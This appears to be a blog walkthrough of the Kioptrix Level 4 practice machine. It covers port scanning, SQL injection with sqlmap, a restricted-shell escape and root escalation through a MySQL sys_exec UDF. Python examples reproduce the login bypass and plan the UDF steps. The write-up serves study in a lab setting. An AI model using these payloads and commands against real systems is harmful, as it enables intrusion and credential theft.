Core dump overflow

Pentest lab - Kioptrix Level 4

This is the final vulnerable machine in the Kioptrix series. To set it up in VMware, create a new virtual machine with the advanced options and use existing virtual disk, pointing it at the Kioptrix 4 virtual disk.

Let’s see what Nmap reveals:

nmap -A -p1-65535 192.168.127.129

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-22 22:35 EEST
Nmap scan report for 192.168.127.129
Host is up (0.00074s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:1F:12:65 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2014-06-22T18:36:57-04:00
| smb-security-mode: 
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

Again, this seems to be a web-based challenge. Navigating to the target website shows this:

login

Supplying a single quote in the password field gives an error, which nicely discloses the database backend as MySQL. The warning also tells us that mysql_query() failed on the malformed statement (mysql_num_rows() was handed false instead of a result), so the quote reached the SQL unescaped:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28 Wrong Username or Password

Sqlmap to the rescue!

sqlmap -u "http://192.168.127.129/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump

Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
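To make the login bypass concrete, here is an added example that is not code from the original post. checklogin.php itself is never shown on the page, so the string-built query below is an assumption about its shape (it is the usual cause of the mysql_num_rows() warning seen above). sqlite3 stands in for MySQL so the example runs offline, and the two rows are the ones sqlmap dumped.

```python
"""Reproducing the checklogin.php auth bypass with a stand-in database.

Added example, not code from the original post. The concatenated query is an
assumption about how checklogin.php builds its SQL; sqlite3 replaces MySQL so
this runs offline. The member rows are the ones sqlmap dumped.
"""
import sqlite3


def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO members VALUES (?, ?, ?)",
        [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAdsafdfwt4gadfga==")],
    )
    return db


def vulnerable_login(db, username, password):
    """Input is concatenated into the statement, as in the assumed PHP.

    Returns True/False for a well-formed query and "error" when the query
    itself breaks: that is the PHP path where mysql_query() returns false and
    mysql_num_rows() emits the warning the post used to fingerprint MySQL.
    """
    sql = (
        f"SELECT id FROM members WHERE username='{username}' "
        f"AND password='{password}'"
    )
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        return "error"
    return len(rows) > 0


def safe_login(db, username, password):
    """Parameterised query: the driver never lets input change the statement."""
    rows = db.execute(
        "SELECT id FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return len(rows) > 0


# Constructed payloads: the lone quote from the post plus two classic bypasses.
PAYLOADS = {
    "fingerprint": ("admin", "'"),
    "tautology":   ("admin", "' OR '1'='1"),
    "comment":     ("john' -- ", "anything"),
}


def run_all(db):
    """Map payload name -> (vulnerable result, parameterised result)."""
    return {
        name: (vulnerable_login(db, u, p), safe_login(db, u, p))
        for name, (u, p) in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, (vuln, safe) in run_all(setup_db()).items():
        print(f"{name:12} vulnerable={vuln!s:6} parameterised={safe}")
```

The "fingerprint" payload reproduces what the post saw: the lone quote breaks the statement and the vulnerable path returns "error" rather than a clean True/False, which is exactly the signal that told the author the input was reaching the database. The parameterised version returns False for every payload and True only for the real credentials.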

Logging in with these credentials didn't yield anything, though: all I could see was a members' control panel with no functionality. So I remembered that the previous challenge allowed SSH access, and tried to log in:

root@kali:~# ssh john@192.168.127.129
The authenticity of host '192.168.127.129 (192.168.127.129)' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.127.129' (RSA) to the list of known hosts.
john@192.168.127.129's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ 

Excellent! Time for some sniffing around. This is not a normal shell, the usual commands don't work, so let's see what's available with the help system:

john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

Hmm, not much. Actions are restricted too; I can't cd wherever I want:

john:~$ cd /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.

So I googled for a bit, and it appears this is lshell, a Python-based limited shell (https://github.com/ghantoos/lshell):

lshell is a shell coded in Python, that lets you restrict a user’s environment to limited sets of commands, choose to enable/ disable any command over SSH (e.g. SCP, SFTP, rsync, etc.), log user’s commands, implement timing restriction, and more.

It is possible to escape from this shell by abusing the echo command to call os.system() and spawn a real shell, a well-known escape in older lshell releases: echo os.system('/bin/bash')

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)

Poking around, I found the following information in /var/www/john/john.php:

$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password

So, root doesn’t have a password for MySQL? Let’s check:

john@Kioptrix4:/var/www/john$ mysql -u root -h localhost 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

Searching around, I found a way to get system root from a MySQL server that runs as root. Here's a quick summary:

  • It is possible to escalate from MySQL root to system root by using User Defined Functions (UDFs). A UDF is a shared library loaded into the mysqld process, so whatever it executes runs with mysqld's privileges, and here mysqld runs as root.

  • We need the lib_mysqludf_sys.so library, which provides functions that interact with the OS. The most useful ones are sys_exec (runs a command and returns its exit status) and sys_eval (runs a command and returns its standard output).

The next step would be to find a way to get the library on the machine with our MySQL server. But that’s not necessary in this case, because it’s already on the server!

john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so

It took a bit of googling and trial and error until I found a way that got me to a root shell. Here is a useful post; the relevant part for us is this:

Until Ubuntu 11.10, the Unix group for administrators with root privileges through sudo had been admin. Starting with Ubuntu 12.04 LTS, it is now sudo, for compatibility with Debian and sudo itself. However, for backwards compatibility, admin group members are still recognized as administrators

So it is possible to make the john account a member of the admin group, which is equivalent to the sudo group. From the MySQL prompt, run this:

SELECT sys_exec('usermod -a -G admin john');

That appends john to the admin group. Here it is on the MySQL command line:

mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 |
+--------------------------------------+
1 row in set (0.11 sec)

Now from john’s shell:

john@Kioptrix4:~$ sudo su
[sudo] password for john: 
root@Kioptrix4:/home/john# whoami
root
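The UDF chain above only works because several things line up: mysqld runs as root, the shared object is already on disk, and sys_exec is already registered. Here is an added preflight check, not code from the original post, that encodes those preconditions and emits the statements to run. It talks to nothing: the HostFacts values at the bottom are constructed to mirror what the walkthrough found, plus a hardened counter-example. On a live host you would fill them from `ps -eo user,comm`, `whereis lib_mysqludf_sys.so`, `SELECT name, dl FROM mysql.func` and /etc/group. The CREATE FUNCTION statements are the ones from lib_mysqludf_sys's install.sql; the HostFacts layout and function names are my own.

```python
"""Preflight for the MySQL UDF to root chain used on Kioptrix 4.

Added example, not code from the original post. Inputs are constructed;
nothing here connects to a database or runs commands.
"""
from dataclasses import dataclass

UDF_LIB = "lib_mysqludf_sys.so"
# Registration statements as shipped in lib_mysqludf_sys's install.sql.
REGISTER_SQL = {
    "sys_exec": f"CREATE FUNCTION sys_exec RETURNS INTEGER SONAME '{UDF_LIB}';",
    "sys_eval": f"CREATE FUNCTION sys_eval RETURNS STRING SONAME '{UDF_LIB}';",
}


@dataclass
class HostFacts:
    ps_lines: list        # `ps -eo user,comm` output, header included
    lib_paths: list       # where the UDF .so was found on disk ([] if absent)
    mysql_func: dict      # name -> dl, from SELECT name, dl FROM mysql.func
    etc_group: list       # /etc/group lines
    target_user: str      # the low-privilege account we hold


def mysqld_user(ps_lines):
    """Account mysqld runs as; UDF code runs with exactly these privileges."""
    for line in ps_lines:
        parts = line.split()
        if len(parts) >= 2 and parts[1] == "mysqld":
            return parts[0]
    return None


def in_group(etc_group, group, user):
    """True if `user` is listed as a supplementary member of `group`."""
    for line in etc_group:
        fields = line.strip().split(":")
        if len(fields) == 4 and fields[0] == group:
            return user in [m for m in fields[3].split(",") if m]
    return False


def plan(facts):
    """Return (feasible, steps): SQL for the mysql client, then the shell
    command that confirms the result. Refuses when root is not reachable."""
    user = mysqld_user(facts.ps_lines)
    if user != "root":
        return False, [f"mysqld runs as {user!r}: sys_exec() would run as that user, not root"]
    if not facts.lib_paths:
        return False, [f"{UDF_LIB} is not on disk; it would have to be uploaded first"]

    steps = [REGISTER_SQL[fn] for fn in ("sys_exec", "sys_eval")
             if fn not in facts.mysql_func]
    # Prove the privilege level before changing anything on the host.
    steps.append("SELECT sys_eval('id');")
    if in_group(facts.etc_group, "admin", facts.target_user):
        steps.append(f"-- {facts.target_user} is already in admin; skip usermod")
    else:
        steps.append(f"SELECT sys_exec('usermod -a -G admin {facts.target_user}');")
    steps.append(f"$ sudo -l    # as {facts.target_user}: admin must appear in sudoers")
    return True, steps


# Constructed facts approximating Kioptrix 4 (the post only shows sys_exec in use).
KIOPTRIX4 = HostFacts(
    ps_lines=["USER     COMMAND", "root     mysqld", "www-data apache2"],
    lib_paths=["/usr/lib/lib_mysqludf_sys.so"],
    mysql_func={"sys_exec": UDF_LIB},
    etc_group=["root:x:0:", "admin:x:119:", "john:x:1001:"],
    target_user="john",
)

# Constructed counter-example: a hardened install where mysqld is not root.
HARDENED = HostFacts(
    ps_lines=["USER     COMMAND", "mysql    mysqld"],
    lib_paths=[], mysql_func={}, etc_group=["admin:x:119:"], target_user="john",
)

if __name__ == "__main__":
    for name, facts in (("kioptrix4", KIOPTRIX4), ("hardened", HARDENED)):
        ok, steps = plan(facts)
        print(f"[{name}] feasible={ok}")
        for s in steps:
            print("   ", s)
```

The first check is the one that matters: on a default modern package mysqld runs as the mysql user, and a UDF then gives you a shell as mysql, not root. The `SELECT sys_eval('id')` step is there so you confirm uid=0 before touching /etc/group on the target.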

Awesome! We finally got root access. In root's home directory there is another congrats.txt, which says there are at least two different tested ways to get root on this system. It sure was an interesting machine, and my favorite in the series, because it wasn't as straightforward as the others; I had to look for more information and try (and fail) different approaches before I hit upon the winning one.

Here’s today’s fortune cookie:

You single-handedly fought your way into this hopeless mess.
